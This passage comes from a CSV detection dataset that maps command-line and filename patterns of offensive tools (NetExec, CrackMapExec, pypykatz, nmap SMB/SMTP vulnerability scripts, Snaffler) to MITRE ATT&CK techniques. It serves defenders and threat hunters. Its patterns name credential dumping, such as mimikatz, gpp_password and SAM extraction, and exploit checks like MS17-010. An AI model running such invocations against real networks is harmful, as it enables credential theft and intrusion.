*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --sam --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -u * -p * * -M dfscoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * --rid-brute*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * --shares --filter-shares *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing 
the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M enum_av*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M enum_dns*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M gpp_password*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M met_inject *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * --wmi ""select Name from 
win32_computersystem""*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb client * shares *use c$*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* smb -M mimikatz --options*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb shareenum *smb2+ntlm-password*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"* smb* -u '' -p ''*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb2-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb2-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb2-time.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb2-vuln-uptime.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-cmds.txt*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"* smb-double-pulsar-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-domains.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-groups.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-processes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-services.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-sessions.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-shares.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smbexec.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* smb-flood.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-mbenum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-os-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-print-text.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-protocols.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-psexec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-security-mode.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-server-stats.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smbsr.db*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"* smbsr.log*","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","138","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" +"* smb-system-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-conficker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-cve2009-3103.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-cve-2017-7494.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms06-025.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms07-029.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms08-067.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms10-054.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms10-061.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-ms17-010.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-regsvc-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-vuln-webexec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smb-webexec-exploit.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-commands.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" +"* smtp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-open-relay.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-strangeport.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-vuln-cve2010-4344.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-vuln-cve2011-1720.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-vuln-cve2011-1764.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* smtp-vuln-cve2020-28017-through-28026-21nails.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"* smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"* snaffler.log*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 
